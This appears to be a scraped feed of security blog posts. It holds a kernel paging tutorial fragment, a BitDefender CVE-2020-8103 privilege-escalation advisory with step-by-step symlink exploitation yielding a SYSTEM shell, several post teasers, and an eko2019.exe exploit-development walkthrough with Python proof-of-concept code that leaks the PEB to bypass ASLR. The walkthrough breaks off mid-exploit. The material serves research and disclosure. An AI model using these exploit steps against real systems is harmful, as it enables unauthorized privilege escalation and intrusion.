Since we converted the PDPT address (which is a base address to begin with), there was no offset in the physical translation, meaning that the PFN was appended with 0’s.

This is mainly because we were fetching the base address of a paging structure, which means it won’t be offset from anything.

If our virtual address would have been FFFFF6FB7DA00008, for instance, our physical address would have been 7bbc8008. This is because the address is at an offset of 0x8 from the base of the PFN!

Awesome, we know know what a physical memory address looks like at a high level. But each entry in a paging structure (a PTE) contains more metadata. What does this metadata look like and how is it useful?

PTEs - For Real This Time

Let’s take a look back at an image that was already displayed, in the !pte output.

More specifically, let’s take a look at the PTE entry, furthest to the right.

PTE at FFFFF68000002880
contains 7A9000007BBA9867
pfn 7bba9     ---DA--UWEV

Let’s take a look at the entry, more specifically the contains line which contains 7A9000007BBA9867.

We can clearly see the PFN here, in between the 7A900000 and 867. But what do these other numbers mean? Additionally, what does ---DA--UWEV mean? These refer to “control bits”, which provision various permissions, features, etc to the memory page. Let’s take a look at each of these bits.

Here are a list of some of the possible control bits. These bits are the ones we care about, and it is not an exhaustive list.

  1. P - The PTE is valid if this bit is set
  2. R/W - Writing is enabled if this bit is set
  3. U/S - If this bit is set, the page is a user mode page. If this bit is clear, the page is a supervisor (kernel) mode page
  4. D - If this bit is set, a write has been made to this page, making it a “dirty” page
  5. A - If this bit is set, this memory page has been referenced at some point

Mouth Of The River

Again, this was by no means meant to be an exhaustive and comprehensive “tell all” of memory paging. This article barely scratched the surface. However, understanding things like control bits and virtual memory and having that as prerequisite knowledge allows you to understand bypassing mitigations such as NX in kernel pool memory, or more ways of bypassing SMEP. The next post will go into bypassing SMEP and NX in the kernel by way of the prerequisite knowledge laid out here.

You know the drill, any comments, questions, corrections, feel free to reach out to me. Until then!

Peace, love, and positivity! :-)

BitDefender Antivirus Free 2020 Elevation of Privilege (CVE-2020-8103 )

By: admin
24 April 2020 at 10:24

Summary

Assigned CVE: CVE-2020-8103 has been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 18/03/2020

Exploit Codehttps://github.com/RedyOpsResearchLabs/-CVE-2020-8103-Bitdefender-Antivirus-Free-EoP

Vendor’s Advisoryhttps://www.bitdefender.com/support/security-advisories/link-resolution-privilege-escalation-vulnerability-bitdefender-antivirus-free-va-8604/

An Elevation of Privileges (EoP) exists in Bitdefender Antivirus Free 2020 < 1.0.17.178 . The latest version we tested is BitDefender Free Edition 1.0.17.169. The exploitation of this EoP, gives the ability to a low privileged user to gain access as NT AUTHORITY\SYSTEM . The exploitation has been tested in installation of BitDefender on Windows 10 1909 (OS Build 18363.720) 64bit .

Description

The exploitation allows any local, low privileged user, to change the Discretionary Access Control List (DACL) of any chosen file. The access you obtain depends on which file you are going to backdoor/overwrite. In the Proof of Concept (PoC) we overwrite the file system32/wermgr.exe and we pop a cmd.exe running as NT AUTHORITY\SYSTEM . The exploitation works with the default installation of BitDefender. When the BitDefender detects a threat, it gives the ability to the user to choose what action to take. The user can choose to Quarantine the threat. After the threat has been placed in Quarantine, the user can choose to restore it. The problem arises because the BitDefeder restores the file as NT AUTHORITY\SYSTEM and without impersonating the current user. This allows the user to create a symlink and restore the file to an arbitrary location or overwrite files which are running as SYSTEM.

Exploitation

  1. Put an EICAR file (or any other file which can be detected as a threat) under an empty folder which you fully control. For example, put an EICAR file to C:\Users\Public\Music
  2. Scan the EICAR file (e.g C:\Users\Public\Music\eicar.txt) with the BitDefender.
  3. When the BitDefender detects the threat, choose to Quarantine the file.
  4. Give some time to the BitDefender and rename the folder C:\Users\Public\Music to C:\Users\Public\Music2 .
  5. Create the symlink C:\Users\Public\Music\eicar.txt (e.g with the CreateSymlink.exe from symboliclink-testing-tools of project zero) and target the file you wish to control. For example CreateSymlink.exe C:\Users\Public\Music\eicar.txt c:\windows\system32\wermgr.exe .
  6. Add the c:\windows\system32\wermgr.exe to the exception list of BitDefender.
  7. Go back to BitDefender and restore the C:\Users\Public\Music\eicar.txt . The first time it may fail. Click restore again.
  8. The BitDefender, running as NT AUTHORITY\SYSTEM, will follow the symlink and will overwrite the file c:\windows\system32\wermgr.exe .
  9. The c:\windows\system32\wermgr.exe will have a new DACL, which gives your user full access. You can overwrite the file with anything you wish.

Video PoC Step By Step

The exploit takes 2 arguments. The second argument is the file we want to overwrite. The first argument, is the file with which we want to overwrite it. As for example the execution:

Exploit.exe C:\users\attacker\Desktop\1.exe c:\windows\system32\wermgr.exe

will overwrite the file c:\windows\system32\wermgr.exe with the file C:\users\attacker\Desktop\1.exe .

The 1.exe is irrelevant to the exploitation. You can choose any file you wish and you can override any file you like. the 1.exe will just execute the cmd.exe to the current user’s session. For example you can execute

Exploit.exe C:\users\attacker\Desktop\test.txt c:\windows\system32\wermgr.exe

and you will overwrite the c:\windows\system32\wermgr.exe with the file C:\users\attacker\Desktop\test.txt


00:00 – 00:56: I present the environment. The low privilege user, the windows version, the BitDefender version and the DACL of the file c:\windows\system32\wermgr.exe . As we can see the user attacker has limited access to the file.

00:56 – 01:54: We run the exploit and the first thing we have to do is to add as an exception the file we target. In this case the file c:\windows\system32\wermgr.exe

01:54 – 02:48: After we add the exception, we go back to the exploit and we press ENTER. After the ENTER button is pressed, the exploit should print three lines which inform us about the AV. At this point, the exploit has created the EICAR file under the C:\Users\Public\Music\ folder. We go to this folder and we scan the file. We opt to move it to the Quarantine. Until this point, there is no reason for the exploit to fail. It just creates the EICAR file. If you do not see the three lines which are presented in the video and inform you about the AV, ensure you have pressed the ENTER a few times.

02:48 – 03:49: At this point the exploit checks that the EICAR file has been removed. In 30″ more or less you should see the message “I go for a coffee. Give me a sec.” . If for some reason you don’t see the message after a few seconds, press ENTER a few times inside the Exploit window. After this message, the Exploit renames the folder C:\Users\Public\Music to C:\Users\Public\Music2 and there is a sleep for 50″ . If you don’t see the second message “I am back. Oh no the bell. BRB.” after 50″ – 60″ just press ENTER again in the exploit window.

03:49 – 04:00: After the message “I am back. Oh no the bell. BRB.” the exploit creates the Symlink. It will create the symlink C:\Users\Public\Music\RESTORE_ME__* * *.txt which targets the c:\windows\system32\wermgr.exe . Then the exploit instructs us to restore the file.

04:00 – 04:20: We go back to the BitDefender and we restore the file. As we observe, we have to press the restore button two times. The BitDefender will restore the eicar file and will overwrite the c:\windows\system32\wermgr.exe . The c:\windows\system32\wermgr.exe will have a new DACL which allows us to overwrite it. The exploit will overwrite the c:\windows\system32\wermgr.exe with our binary “1.exe” . At this point the exploit should terminate in a few seconds. If you observe a delay on the exploit, press ENTER a few times.

04:20 – end: This is irrelevant with the BitDefender issue. This is just a way to trigger the execution of the file c:\windows\system32\wermgr.exe (which is now the 1.exe) as SYSTEM and gain a shell as NT AUTHORITY\SYSTEM . As we can see the c:\windows\system32\wermgr.exe has been ovewritten by the 1.exe and the new DACL gives the “attacker” full access over the file.

Resources

GitHub

You can find the exploit code in our Github at https://github.com/RedyOpsResearchLabs/

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post BitDefender Antivirus Free 2020 Elevation of Privilege (CVE-2020-8103 ) appeared first on REDYOPS Labs.

NotSoSmartConfig: broadcasting WiFi credentials Over-The-Air

20 April 2020 at 16:00
During one of our latest IoT Penetration Tests we tested a device based on the ESP32 SoC by EspressIF. While assessing the activation procedure we faced for the first time a beautiful yet dangerous protocol: SmartConfig. The idea behind the SmartConfig protocol is to allow an unconfigured IoT device to connect to a WiFi network without requiring a direct connection between the configurator and the device itself – I know, it’s scary.

Tabletopia: from XSS to RCE

By: voidsec
8 April 2020 at 15:02

During this period of social isolation, a friend of mine proposed to play some online “board games”. He proposed “Tabletopia”: a cool sandbox virtual table with more than 800 board games. Tabletopia is both accessible from its own website and from the Steam’s platform. While my friends decided to play from their browser, I’ve opted […]

The post Tabletopia: from XSS to RCE appeared first on VoidSec.

SLAE – Assignment #7: Custom Shellcode Crypter

By: voidsec
2 April 2020 at 14:55

Assignment #7: Custom Shellcode Crypter Seventh and last SLAE’s assignment requires to create a custom shellcode crypter. Since I had to implement an entire encryption schema both in python as an helper and in assembly as the main decryption routine, I’ve opted for something simple. I’ve chosen the Tiny Encryption Algorithm (TEA) as it does […]

The post SLAE – Assignment #7: Custom Shellcode Crypter appeared first on VoidSec.

SLAE – Assignment #6: Polymorphic Shellcode

By: voidsec
2 April 2020 at 14:39

Assignment #6: Polymorphic Shellcode Sixth SLAE’s assignment requires to create three different (polymorphic) shellcodes version starting from published Shell Storm’s examples. I’ve decided to take this three in exam: http://shell-storm.org/shellcode/files/shellcode-752.php – linux/x86 execve (“/bin/sh”) – 21 bytes http://shell-storm.org/shellcode/files/shellcode-624.php – linux/x86 setuid(0) + chmod(“/etc/shadow”,0666) – 37 bytes http://shell-storm.org/shellcode/files/shellcode-231.php – linux/x86 open cd-rom loop (follows “/dev/cdrom” symlink) […]

The post SLAE – Assignment #6: Polymorphic Shellcode appeared first on VoidSec.

Exploit Development: Rippity ROPpity The Stack Is Our Property - Blue Frost Security eko2019.exe Full ASLR and DEP Bypass on Windows 10 x64

27 March 2020 at 00:00

Introduction

I recently have been spending the last few days working on obtaining some more experience with reverse engineering to complement my exploit development background. During this time, I stumbled across this challenge put on by Blue Frost Security earlier in the year- which requires both reverse engineering and exploit development skills. Although I would by no means consider myself an expert in reverse engineering, I decided this would be a nice way to try to become more well versed with the entire development lifecycle, starting with identifying vulnerabilities through reverse engineering to developing a functioning exploit.

Before we begin, I will be using using Ghidra and IDA Freeware 64-bit to reverse the eko2019.exe application. In addition, I’ll be using WinDbg to develop the exploit. I prefer to use IDA to view the execution of a program- but I prefer to use the Ghidra decompiler to view the code that the program is comprised of. In addition to the aforementioned information, this exploit will be developed on Windows 10 x64 RS2, due to the fact the I already had a VM with this OS ready to go. This exploit will work up to Windows 10 x64 RS6 (1903 build), although the offsets between addresses will differ.

Reverse, Reverse!

Starting the application, we can clearly see the server has echoed some text into the command prompt where the server is running.

After some investigation, it seems this application binds to port 54321. Looking at the text in the command prompt window leads me to believe printf(), or similar functions, must have been called in order for the application to display this text. I am also inclined to believe that these print functions must be located somewhere around the routine that is responsible for opening up a socket on port 54321 and accepting messages. Let’s crack open eko2019.exe in IDA and see if our hypothesis is correct.

By opening the Strings subview in IDA, we can identify all of the strings within eko2019.exe.

As we can see from the above image, we have identified a string that seems like a good place to start! "[+] Message received: %i bytes\n" is indicative that the server has received a connection and message from the client (us). The function/code that is responsible for incoming connections may be around where this string is located. By double-clicking on .data:000000014000C0A8 (the address of this string), we can get a better look at the internals of the eko2019.exe application, as shown below.

Perfect! We have identified where the string "[+] Message received: %i bytes\n" resides. In IDA, we have the ability to cross reference where a function, routine, instruction, etc. resides. This functionality is outlined by DATA XREF: sub_1400011E0+11E↑o comment, which is a cross reference of data in this case, in the above image. If we double click on sub_1400011E0+11E↑o in the DATA XREF comment, we will land on the function in which the "[+] Message received: %i bytes\n" string resides.

Nice! As we can see from the above image, the place in which this string resides, is location (loc) loc_1400012CA. If we trace execution back to where it originated, we can see that the function we are inside is sub_1400011E0 (eko2019.exe+0x11e0).

After looking around this function for awhile, it is evident this is the function that handles connections and messages! Knowing this, let’s head over to Ghidra and decompile this function to see what is going on.

Opening the function in Ghidra’s decompiler, a few things stand out to us, as outlined in the image below.

Number one, The local_258 variable is initialized with the recv() function. Using this function, eko2019.exe will “read in” the data sent from the client. The recv() function makes the function call with the following arguments:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function.
  • A pointer to where the buffer that was received will be written to (local_28).
  • The specified length which local_28 should be (0x10 hexadecimal bytes/16 decimal bytes).
  • Zero, which represents what flags should be implemented (none in this case).

What this means, is that the size of the request received by the recv() function will be stored in the variable local_258.

This is how the call looks, disassembled, within IDA.

The next line of code after the value of local_258 is set, makes a call to printf() which displays a message indicating the “header” has been received, and prints the value of local_258.

printf(s__[+]_Header_received:_%i_bytes_14000c008,(ulonglong)local_258)

We can interpret this behavior as that eko2019.exe seems to accept a header before the “message” portion of the client request is received. This header must be 0x10 hexadecimal bytes (16 decimal bytes) in length. This is the first “check” the application makes on our request, thus being the first “check” we must bypass.

Number two, after the header is received by the program, the specific variable that contains the pointer to the buffer received by the previous recv() request (local_28) is compared to the string constant 0x393130326f6b45, or Eko2019 in text form, in an if statement.

if (local_28 == 0x393130326f6b45) {

Taking a look at the data type of the local_28, declared at the beginning of this function, we notice it is a longlong. This means that the variable should 8 bytes in totality. We notice, however, that 0x393130326f6b45 is only 7 bytes in length. This behavior is indicatory that the string of Eko2019 should be null terminated. The null character will provide the last byte needed for our purposes.

This is how this check is executed, in IDA.

Number three, is the variable local_20’s size is compared to 0x201 (513 decimal).

if (local_20 < 0x201) {

Where does this variable come from you ask? If we take a look two lines down, we can see that local_20 is used in another recv() call, as the length of the buffer that stores the request.

local_258 = recv(param_1,local_238,(uint)(ushort)local_20,0);

The recv() call here again uses the same type of arguments as the previous call and reuses the variable local_258. Let’s take a look at the declaration of the variable local_238 in the above recv() function call, as it hasn’t been referenced in this blog post yet.

char local_238 [512];

This allocates a buffer of 512 bytes. Looking at the above recv() call, here is how the arguments are lined up:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function is used again.
  • A pointer to where the buffer that was received will be written to (local_238 this time, which is 512 bytes).
  • The specified length, which is represented by local_20. This variable was used in the check implemented above, which looks to see if the size of the data recieved in the buffer is 512 bytes or less.
  • Zero, which represents what flags should be implemented (none in this case).

The last check looks to see if our message is sent in a multiple of 8 (aka aligned properly with a full 8 byte address). This check can be identified with relative ease.

uVar2 = (int)local_258 >> 0x1f & 7;
if ((local_258 + uVar2 & 7) == uVar2) {
          iVar1 = printf(s__[+]_Remote_message_(%i):_'%s'_14000c0f8,(ulonglong)DAT_14000c000, local_238);

The size of local_258, which at this point is the size of our message (not the header), is shifted to the right, via the bitwise operator >>. This value is then bitwise AND’d with 7 decimal. This is what the result would look like if our message size was 0x200 bytes (512 decimal), which is a known multiple of 8.

This value gets stored in the uVar2 variable, which would now have a value of 0, based on the above photo.

If we would like our message to go through, it seems as though we are going to need to satisfy the above if statement. The if statement adds the value of local_258 (presumably 0x200 in this example) to the value of uVar2, while using bitwise AND on the result of the addition with 7 decimal. If the total result is equal to uVar2, which is 0, the message is sent!

As we can see, the statement local_258 + uVar2 == uVar2 is indeed true, meaning we can send our message!

Let’s try another scenario with a value that is not a multiple of 8, like 0x199.

Using the same forumla above, with the bitwise shift right operator, we yield a value of 0.

Taking this value of 0, adding it to 0x199 and using bitwise AND on the result- yields a nonzero value (1).

This means the if statement would have failed, and our message would not go have gone through (since 0x199 is not a multiple of 8)!

In total, here are the checks we must bypass to send our buffer:

  1. A 16 byte header (0x10 hexadecimal) with the string 0x393130326f6b45, which is null terminated, as the first 8 bytes (remember, the first 16 bytes of the request are interpreted as the header. This means we need 8 additional bytes appended to the null terminated string).
  2. Our message (not counting the header) must be 512 bytes (0x200 hexadecimal bytes) or less
  3. Our message’s length must be a multiple of 8 (the size of an x64 memory address)

Now that we have the ability to bypass the checks eko2019.exe makes on our buffer (which is comprised of the header and message), we can successfully interact with the server! The only question remains- where exactly does this buffer end up when it is received by the program? Will we even be able to locate this buffer? Is this only a partial write? Let’s take a look at the following snippet of code to find out.

local_250[0] = FUNC_140001170
hProcess = GetCurrentProcess();
WriteProcessMemory(hProcess,FUN_140001000,local_250,8,&local_260);

The Windows API function GetCurrentProcess() first creates a handle to the current process (eko2019.exe). This handle is passed to a call to WriteProcessMemory(), which writes data to an area of memory in a specified process.

According Microsoft Docs (formerly known as MSDN), a call to WriteProcessMemory() is defined as such.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);
  • hProcess in this case is will be set to the current process (eko2019.exe).
  • lpBaseAddress is set to the function inside of eko2019.exe, sub_140001000 (eko2019.exe+0x1000). This will be where WriteProcessMemory() starts writing memory to.
  • lpBuffer is where the memory written to lpBaseAddress will be taken from. In our case, the buffer will be taken from function sub_140001170 (eko2019.exe+0x1170), which is represented by the variable local_250.
  • nSize is statically assigned as a value of 8, this function call will write one QWORD.
  • *lpNumberOfBytesWritten is a pointer to a variable that will receive the number of bytes written.

Now that we have better idea of what will be written where, let’s see how this all looks in IDA.

There are something very interesting going on in the above image. Let’s start with the following instructions.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If you can recall from the WriteProcessMemory() arguments, the buffer in which WriteProcessMemory() will write from, is actually from the function sub_140001170, which is eko2019.exe+0x1170 (via the local_250 variable). From the above assembly code, we can see how and where this function is utilized!

Looking at the assembly code, it seems as though the unkown data type, unk_14000E520, is placed into the RCX register. The value pointed to by this location (the actual data inside the unknown data type), with the value of RAX tacked on, is then placed fully into RCX. RCX is then passed as a function parameter (due to the x64 __fastcall calling convention) to function sub_140001170 (eko2019.exe+0x1170).

This function, sub_140001170 (eko2019.exe+0x1170), will then return its value. The returned value of this function is going to be what is written to memory, via the WriteProcessMemory() function call.

We can recall from the WriteProcessMemory() function arguments earlier, that the location to which sub_140001170 will be written to, is sub_140001000 (eko2019.exe+0x1000). What is most interesting, is that this location is actually called directly after!

call sub_140001000

Let’s see what sub_140001000 looks in IDA.

Essentially, when sub_140001000 (eko2019.exe+0x1000) is called after the WriteProcessMemory() routine, it will land on and execute whatever value the sub_140001170 (eko2019.exe+0x1170) function returns, along with some NOPS and a return.

Can we leverage this functionality? Let’s find out!

Stepping Stones

Now that we know what will be written to where, let’s set a breakpoint on this location in memory in WinDbg, and start stepping through each instruction and dumping the contents of the registers in use. This will give us a clearer understanding of the behavior of eko2019.exe

Here is the proof of concept we will be using, based on the checks we have bypassed earlier.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)
s.recv(1024)
s.close()

Before sending this proof of concept, let’s make sure a breakpoint is set at ek2010.exe+0x1330 (sub_140001330), as this is where we should land after our header is sent.

After sending our proof of concept, we can see we hit our breakpoint.

In addition to execution pausing, it seems as though we also control 0x1f8 bytes on the stack (504 decimal).

Let’s keep stepping through instructions, to see where we get!

After stepping through a few instructions, execution lands at this instruction, shown below.

lea rcx,[eko2019+0xe520 (00007ff6`6641e520)]

This instruction loads the address of eko2019.exe+0xe520 into RCX. Looking back, we recall the following is the decompiled code from Ghidra that corresponds to our current instruction.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If we examine what is located at eko2019.exe+0xe520, we come across some interesting data, shown below.

It seems as though this value, 00488b01c3c3c3c3, will be loaded into RCX. This is very interesting, as we know that c3 bytes are that of a “return” instruction. What is of even more interest, is the first byte is set to zero. Since we know RAX is going to be tacked on to this value, it seems as though whatever is in RAX is going to complete this string! Let’s step through the instruction that does this.

RAX is currently set to 0x3e

The following instruction is executed, as shown below.

mov rcx, [rcx+rax*8]

RCX now contains the value of RAX + RCX!

Nice! This value is now going to be passed to the sub_140001170 (eko2019.exe+0x1170) function.

As we know, most of the time a function executes- the value it returns is placed in the accumulator register (RAX in this case). Take a look at the image below, which shows what value the sub_140001170 (eko2019.exe+0x1170) function returns.

Interesting! It seems as though the call to sub_140001170 (eko2019.exe+0x1170) inverted our bytes!

Based off of the research we have done previously, it is evident that this is the QWORD that is going to be written to sub_140001000 via the WriteProcessMemory() routine!

As we can see below, the next item up for execution (that is of importance) is the GetCurrentProcess() routine, which will return a handle to the current process (eko2019.exe) into RAX, similarly to how the last function returned its value into RAX.

Taking a look into RAX, we can see a value of ffffffffffffffff. This represents the current process! For instance, if we wanted to call WriteProcessMemory() outside of a debugger in the C programming language for example, specifying the first function argument as ffffffffffffffff would represent the current process- without even needing to obtain a handle to the current process! This is because technically GetCurrentProccess() returns a “pseudo handle” to the current process. A pseudo handle is a special constant of (HANDLE)-1, or ffffffffffffffff.

All that is left now, is to step through up until the call to WriteProcessMemory() to verify everything will write as expected.

Now that WriteProcessMemory() is about to be called- let’s take a look at the arguments that will be used in the function call.

The fifth argument is located at RSP + 0x20. This is what the __fastcall calling convention defaults to after four arguments. Each argument after 5th will start at the location of RSP + 0x20. Each subsequent argument will be placed 8 bytes after the last (e.g. RSP + 0x28, RSP + 0x30, etc. Remember, we are doing hexadecimal math here!).

Awesome! As we can see from the above image, WriteProcessMemory() is going to write the value returned by sub_140001170 (eko2019.exe+0x1170), which is located in the R8 register, to the location of sub_140001000 (eko2019.exr+0x1000).

After this function is executed, the location to which WriteProcessMemory() wrote to is called, as outlined by the image below.

Cool! This function received the buffer from the sub_140001170 (eko2019.exe+0x1170) function call. When those bytes are interpreted by the disassembler, you can see from the image above- this 8 byte QWORD is interpreted as an instruction that moves the value pointed to by RCX into RAX (with the NOPs we previously discovered with IDA)! The function returns the value in RAX and that is the end of execution!

Is there any way we can abuse this functionality?

Curiosity Killed The Cat? No, It Just Turned The Application Into One Big Info Leak

We know that when sub_140001000 (eko2019.exe+0x1000) is called, the value pointed to by RCX is placed into RAX and then the function returns this value. Since the program is now done accepting and returning network data to clients, it would be logical that perhaps the value in RAX may be returned to the client over a network connection, since the function is done executing! After all, this is a client/server architecture. Let’s test this theory, by updating our proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Can we receive any data back?
test = s.recv(1024)
test_unpack = struct.unpack_from('<Q', test)
test_index = test_unpack[0]

print "[+] Did we receive any data back from the server? If so, here it is: {0}".format(hex(test_index))

# Closing the connection
s.close()

What this updated code will do is read in 1024 bytes from the server response. Then, the struct.unpack_from() function will interpret the data received back in the response from the server in the form of an unsigned long long (8 byte integer basically). This data is then indexed at its “first” position and formatted into hex and printed!

If you recall from the previous image in the last section that outlined the mov rax, qword ptr [ecx] operation in the sub_140001000 function, you will see the value that was moved into RAX was 0x21d. If everything goes as planned, when we run this script- that value should be printed to the screen in our script! Let’s test it out.

Awesome! As you can see, we were able to extract and view the contents of the returned value of the function call to sub_140001000 (eko2019.exe+0x1000) remotely (aka RAX)! This means that we can obtain some type of information leakage (although, it is not particuraly useful at the moment).

As reverse engineers, vulnerability researchers, and exploit developers- we are taught never to accept things at face value! Although eko2019.exe tells us that we are not supposed to send a message longer than 512 bytes- let’s see what happens when we send a value greater than 512! Adhering to the restriction about our data being in a multiple of 8, let’s try sending 528 bytes (in just the message) to the server!

Interesting! The application crashes! However, before you jump to conclusions- this is not the result of a buffer overflow. The root cause is something different! Let’s now identify where this crash occurs and why.

Let’s reattach eko2019.exe to WinDbg and view the execution right before the call to sub_140001170 (eko2019.exe+0x1170).

Again, execution is paused right before the call to sub_140001170 (eko2019.exe+0x1170)

At this point, the value of RAX is about to be added to the following data again.

Let’s check out the contents of the RAX register, to see what is going to get tacked on here!

Very interesting! It seems as though we now actually control the byte in RAX- just by increasing the number of bytes sent! Now, if we step through the WriteProcessMemory() function call that will write this string and call it later on, we can see that this is why the program crashes.

As you can see, execution of our program landed right before the move instruction, which takes the contents pointed to by RCX and places it into RAX. As we can see below, this was not an access violation because of DEP- but because it is obviously an invalid pointer. DEP doesn’t apply here, because we are not executing from the stack.

This is all fine and dandy- but the REAL issue can be identified by looking at the state of the registers.

This is the exciting part- we actually control the contents of the RCX register! This essentially gives us an arbitrary read primtive due to the fact we can control what gets loaded into RCX, extract its contents into RAX, and return it remotely to the client! There are four things we need to take into consideration:

  1. Where are the bytes in our message buffer stored into RCX
  2. What exactly should we load into RCX?
  3. Where is the byte that comes before the mov rax, qword ptr [rcx] instruction located?
  4. What should we change said byte to?

Let’s address numbers three and four in the above list firstly.

Bytes Bytes Baby

In a previous post about ROP, we talked about the concept of byte splitting. Let’s apply that same concept here! For instance, \x41 is an opcode, that when combined with the opcodes \x48\x8b\x01 (which makes up the move instruction in eko2019.exe we are talking about) does not produce a variant of said instruction.

Let’s put our brains to work for a second. We have an information leak currently- but we don’t have any use for it at the moment. As is common, let’s leverage this information leak to bypass ASLR! To do this, lets start by trying to access the Process Environment Block, commonly referred to as the PEB, for the current process (eko2019.exe)! The PEB for a process is the user mode representation of a process, similarly to how _EPROCESS is the kernel mode representation of kernel mode objects.

Why is this relevant this you ask? Since we have the ability to extract the pointer from a location in memory, we should be able to use our byte splitting primitive to our advantage! The PEB for the current process can be accessed through a special segment register, GS, at an offset of 0x60. Recall from this previous of two posts about kernel shellcode, that a segment register is just a register that is used to access different types of data structures (such as the PEB of the current process). The PEB, as will be explained later, contains some very prudent information that can be leveraged to turn our information leak into a full ASLR bypass.

We can potentially replace the \x41 in front of our previous mov rax, qword ptr [rcx] instruction, and change it to create a variant of said instruction, mov rax, qword ptr gs:[rcx]! This would also mean, however, that we would need to set RCX to 0x60 at the time of this instruction.

Recall that we have the ability to control RCX at this time! This is ideal, because we can use our ability to control RCX to load the value of 0x0000000000000060 into it- and access the GS segment register at this offset!

After some research, it seems as though the bytes \x65\x48\x8b\x01 are used to create the instruction mov rax, qword ptr gs:[rcx]. This means we need to replace the \x41 byte that caused our access violation with a \x65 byte! Firstly, however, we need to identify where this byte is within our proof of concept.

Updating our proof of concept, we found that the byte we need to replace with \x65 is at an offset of 512 into our 528 byte buffer. Additionally, the bytes that control the value of RCX seem to come right after said byte! This was all found through trial and error.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

As you can see from the image below, when we hit the move operation and we have got the correct instruction in place.

RAX now contains the value of PEB!

In addition, our remote client has been able to save the PEB into a variable, which means we can always dynamically resolve this value. Note that this value will always change after the application (process) is restarted.

What is most devastating about identifying the PEB of eko2019.exe, is that the base address for the current process (eko2019.exe in this case) is located at an offset of PEB+0x10

Essentially, all we have to do is use our ability to control RCX to load the value of PEB+0x10 into it. At that point, the application will extract that value into RAX (what PEB+0x10 points to). The data PEB+0x10 points to is the actual base virtual address for eko2019.exe! This value will then be returned to the client, via RAX. This will be done with a second request! Note that this time we do not need to access the GS segment register (in the second request). If you can recall, before we accessed the GS segment register, the program naturally executed a mov rax, qword ptr[rcx] instruction. To ensure this is the instruction executed this time, we will use our byte we control to implement a NOP- to slide into the intended instruction.

As mentioned earlier, we will close our first connection to the client, and then make a second request! This update to the exploit development process is outlined in the updated proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
